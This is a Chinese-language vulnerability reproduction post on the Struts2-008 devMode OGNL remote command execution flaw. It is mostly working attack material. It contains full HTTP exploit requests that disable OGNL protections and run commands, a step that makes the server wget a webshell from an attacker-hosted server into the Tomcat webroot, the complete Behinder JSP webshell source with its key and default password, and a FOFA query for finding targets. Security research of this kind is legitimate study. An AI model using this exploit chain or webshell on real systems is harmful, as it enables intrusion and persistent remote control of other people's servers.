-Struts2-008 远程命令执行漏洞

本文转载于公众号：融云攻防实验室，原文地址：

漏洞复现-Struts2-008 远程命令执行漏洞

0x01 阅读须知

0x02 漏洞描述

Struts是Apache软件基金会（ASF）赞助的一个开源项目。它最初是Jakarta项目中的一个子项目，并在2004年3月成为ASF的顶级项目。它通过采用JavaServlet/JSP技术，实现了基于JavaEEWeb应用的Model-View-Controller（MVC）设计模式的应用框架，是MVC经典设计模式中的一个经典产品。Struts2-008是因为struts2应用开启devMode模式后会有多个调试接口能够直接查看对象信息或直接执行命令:例如在devMode模式下直接添加参数?debug=command&expression=，会直接执行后面的OGNL表达式，可以直接执行命令。

0x03 漏洞复现

漏洞影响:Struts2 2.1.0 – 2.3.1

FOFA:Struts2

1.构造poc查看文件ls（有webapps证明这里为tomcat，tomcat默认的主页路径为/usr/local/tomcat/webapps/ROOT/）

GET /devmode.action?debug=command&expression=%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22ls%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close() HTTP/1.1
Host: x.x.x.x:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: JSESSIONID=529D1A2C1FFEE38543037185EAEE7A37
Upgrade-Insecure-Requests: 1

2.设置一个python3下载文件的网页，上存放冰蝎马，并构造wget下载远端冰蝎马命令

#python3下载如下：
python3 -m http.server 80 
#冰蝎马如下：
<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
#下载代码如下：
wget http://x.x.x.x/shell.jsp -O /usr/local/tomcat/webapps/ROOT/shell.jsp

3.构造下载远端冰蝎马到tomcat根目录的payload 

GET /devmode.action?debug=command&expression=%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22wget%20http%3A%2F%2F192.168.1.10%2Fshell.jsp%20-O%20%2Fusr%2Flocal%2Ftomcat%2Fwebapps%2FROOT%2Fshell.jsp%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close() HTTP/1.1
Host: x.x.x.x:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: JSESSIONID=529D1A2C1FFEE38543037185EAEE7A37
Upgrade-Insecure-Requests: 1

5.冰蝎连接，得到一个shell

http://x.x.x.x:8080/shell.jsp #路径，默认密码为rebeyond